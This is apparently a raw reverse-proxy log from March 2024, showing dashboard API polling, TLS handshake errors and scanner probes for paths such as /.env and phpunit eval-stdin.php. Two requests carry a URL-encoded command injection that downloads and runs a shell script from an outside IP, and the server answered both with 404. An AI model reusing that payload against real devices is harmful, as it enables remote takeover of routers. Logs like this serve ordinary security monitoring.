"-" 0ms +10.2.1.1 - - [30/Mar/2024:17:00:57 +0000] "GET / HTTP/1.0" 200 1163 "-" "-" 1214 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:17:01:31 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1215 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:17:01:31 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1216 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:17:02:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1217 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:17:02:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1218 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:17:03:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1219 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:17:03:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1220 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:17:05:51 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1221 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:17:05:59 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1222 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:17:12:44 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1223 "-" "-" 0ms +time="2024-03-30T17:13:00Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:17:17:55 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1224 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:17:19:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1225 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:17:19:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1226 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:17:20:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1227 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:17:20:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1228 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:17:21:23 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 1229 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:17:21:23 +0000] "GET /dashboard/ HTTP/1.1" 200 1163 "-" "-" 1230 "dashboard@internal" "-" 0ms +time="2024-03-30T17:21:34Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:17:21:34 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1231 "-" "-" 0ms +time="2024-03-30T17:21:35Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:17:21:35 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1232 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:17:30:27 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1233 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:17:33:15 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1234 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:17:38:55 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1235 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:17:38:55 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1236 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:17:39:55 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1237 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:17:39:55 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1238 "api@internal" "-" 0ms +time="2024-03-30T17:47:13Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T17:47:13Z" level=debug msg="http: TLS handshake error from 10.0.0.4:5173: read tcp 10.2.0.36:80->10.0.0.4:5173: read: connection reset by peer" +10.2.1.1 - - [30/Mar/2024:17:51:33 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1239 "-" "-" 0ms +time="2024-03-30T17:52:34Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:17:52:34 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1240 "-" "-" 0ms +time="2024-03-30T17:52:35Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:17:52:35 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1241 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:17:58:32 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1242 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:17:58:32 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1243 "api@internal" "-" 0ms +time="2024-03-30T17:59:29Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:17:59:31 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1244 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:17:59:31 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1245 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:18:03:45 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1246 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:18:13:09 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1247 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:18:16:57 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1248 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:18:16:57 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1249 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:18:17:56 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1250 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:18:17:56 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1251 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:18:31:29 +0000] "GET /.env HTTP/1.1" 404 19 "-" "-" 1252 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:18:31:29 +0000] "POST / HTTP/1.1" 404 19 "-" "-" 1253 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:18:34:16 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1254 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:18:35:33 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1255 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:18:35:33 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1256 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:18:36:33 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1257 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:18:36:33 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1258 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:18:36:42 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1259 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:18:37:33 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1260 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:18:37:33 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1261 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:18:55:36 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1262 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:18:55:36 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1263 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:18:56:19 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1264 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:18:56:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1265 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:18:56:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1266 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:18:57:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1267 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:18:57:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1268 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:18:58:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1270 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:18:58:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1269 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:18:59:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1271 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:18:59:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1272 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:19:00:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1273 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:19:00:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1274 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:19:16:57 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1275 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:19:16:57 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1276 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:19:17:57 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1277 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:19:17:57 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1278 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:19:18:57 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1279 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:19:18:57 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1280 "api@internal" "-" 0ms +time="2024-03-30T19:19:04Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:19:19:04 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 19 "-" "-" 1281 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:19:19:04 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 19 "-" "-" 1282 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:19:19:57 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1283 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:19:19:57 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1284 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:19:20:15 +0000] "GET / HTTP/1.0" 200 1163 "-" "-" 1285 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:19:20:17 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1286 "-" "-" 0ms +time="2024-03-30T19:23:03Z" level=debug msg="http: TLS handshake error from 10.2.1.1:11683: tls: client offered only unsupported versions: []" +time="2024-03-30T19:24:19Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T19:24:20Z" level=debug msg="http: TLS handshake error from 10.2.0.129:47260: read tcp 10.2.0.36:443->10.2.0.129:47260: read: connection reset by peer" +10.2.1.1 - - [30/Mar/2024:19:26:49 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1287 "-" "-" 0ms +time="2024-03-30T19:31:03Z" level=debug msg="http: TLS handshake error from 10.0.0.4:10252: tls: unsupported SSLv2 handshake received" +time="2024-03-30T19:31:03Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T19:31:03Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T19:31:03Z" level=debug msg="http: TLS handshake error from 10.2.1.1:9285: tls: client offered only unsupported versions: [301]" +time="2024-03-30T19:31:03Z" level=debug msg="http: TLS handshake error from 10.0.0.4:31589: tls: client offered only unsupported versions: []" +time="2024-03-30T19:31:03Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T19:31:03Z" level=debug msg="http: TLS handshake error from 10.2.0.129:34919: tls: no cipher suite supported by both client and server" +time="2024-03-30T19:31:03Z" level=debug msg="http: TLS handshake error from 10.2.1.1:1122: tls: client offered only unsupported versions: [302]" +10.0.0.4 - - [30/Mar/2024:19:31:54 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1288 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:19:37:13 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1289 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:19:37:13 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1290 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:19:38:10 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1291 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:19:38:10 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1292 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:19:39:10 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1293 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:19:39:10 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1294 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:19:41:41 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1295 "-" "-" 0ms +time="2024-03-30T19:41:42Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T19:41:51Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:19:41:51 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1296 "-" "-" 0ms +time="2024-03-30T19:41:52Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T19:41:54Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T19:41:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:39492: read tcp 10.2.0.36:443->10.0.0.4:39492: read: connection reset by peer" +time="2024-03-30T19:41:55Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T19:41:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:3185: EOF" +time="2024-03-30T19:41:56Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T19:41:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:28067: EOF" +time="2024-03-30T19:41:56Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T19:41:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:42394: tls: no cipher suite supported by both client and server" +time="2024-03-30T19:41:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:12570: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T19:41:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:38816: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T19:41:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:13599: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T19:42:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T19:42:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:61076: EOF" +time="2024-03-30T19:42:01Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T19:42:01Z" level=debug msg="http: TLS handshake error from 10.2.0.129:13328: EOF" +time="2024-03-30T19:42:01Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T19:42:02Z" level=debug msg="http: TLS handshake error from 10.0.0.4:27756: EOF" +time="2024-03-30T19:42:02Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T19:42:03Z" level=debug msg="http: TLS handshake error from 10.2.1.1:33589: EOF" +time="2024-03-30T19:50:02Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T19:50:02Z" level=debug msg="http: TLS handshake error from 10.2.1.1:25261: read tcp 10.2.0.36:80->10.2.1.1:25261: read: connection reset by peer" +time="2024-03-30T19:50:27Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T19:50:27Z" level=debug msg="http: TLS handshake error from 10.2.0.129:55818: remote error: tls: bad certificate" +10.0.0.4 - - [30/Mar/2024:19:54:18 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1297 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:19:54:18 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1298 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:19:55:18 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1299 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:19:55:18 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1300 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:19:58:20 +0000] "GET /manager/text/list HTTP/1.1" 404 19 "-" "-" 1301 "-" "-" 0ms +time="2024-03-30T20:09:50Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:20:09:51 +0000] "GET /actuator/health HTTP/1.1" 404 19 "-" "-" 1302 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:20:12:32 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1303 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:20:12:32 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1304 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:20:13:31 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1305 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:20:13:31 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1306 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:20:14:31 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1307 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:20:14:31 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1308 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:20:17:05 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1309 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:20:23:35 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1310 "-" "-" 0ms +time="2024-03-30T20:23:55Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:20:23:55 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1311 "-" "-" 0ms +time="2024-03-30T20:27:59Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:20:28:00 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1312 "-" "-" 0ms +time="2024-03-30T20:28:00Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:20:28:00 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 1313 "-" "-" 0ms +time="2024-03-30T20:28:01Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T20:28:01Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:20:28:01 +0000] "GET /sitemap.xml HTTP/1.1" 404 19 "-" "-" 1314 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:20:28:01 +0000] "GET /robots.txt HTTP/1.1" 404 19 "-" "-" 1315 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:20:33:21 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1316 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:20:33:21 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1317 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:20:34:21 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1318 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:20:34:21 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1319 "api@internal" "-" 0ms +time="2024-03-30T20:38:23Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:20:38:23 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1320 "-" "-" 0ms +time="2024-03-30T20:38:24Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:20:38:24 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1321 "-" "-" 0ms +time="2024-03-30T20:46:34Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T20:46:34Z" level=debug msg="http: TLS handshake error from 10.2.0.129:42963: read tcp 10.2.0.36:443->10.2.0.129:42963: read: connection reset by peer" +time="2024-03-30T20:48:04Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:20:48:04 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1322 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:20:49:17 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1323 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:20:51:12 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1324 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:20:51:12 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1325 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:20:52:11 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1326 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:20:52:11 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1327 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:20:53:11 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1328 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:20:53:11 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1329 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:20:53:15 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1330 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:20:54:11 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1331 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:20:54:11 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1332 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:01:25 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1333 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:01:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1334 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:02:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1335 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:02:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1336 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:03:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1337 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:21:03:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1338 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:04:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1339 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:21:04:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1340 "api@internal" "-" 0ms +time="2024-03-30T21:09:09Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:21:09:10 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 19 "-" "-" 1341 "-" "-" 0ms +time="2024-03-30T21:09:42Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:21:09:42 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1342 "-" "-" 0ms +time="2024-03-30T21:15:15Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:21:15:16 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "-" 1343 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:21:15:19 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 404 19 "-" "-" 1344 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:21:22:50 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1345 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:22:50 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1346 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:23:50 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1347 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:21:23:50 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1348 "api@internal" "-" 0ms +time="2024-03-30T21:24:33Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:21:24:33 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "-" 1349 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:21:28:23 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1350 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:21:28:37 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1351 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:30:18 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1352 "-" "-" 0ms +time="2024-03-30T21:31:46Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:21:31:46 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1353 "-" "-" 0ms +time="2024-03-30T21:31:47Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T21:31:47Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:47Z" level=debug msg="http: TLS handshake error from 10.2.1.1:53322: EOF" +time="2024-03-30T21:31:47Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:47Z" level=debug msg="http: TLS handshake error from 10.2.0.129:5262: EOF" +time="2024-03-30T21:31:47Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:47Z" level=debug msg="http: TLS handshake error from 10.0.0.4:31107: tls: 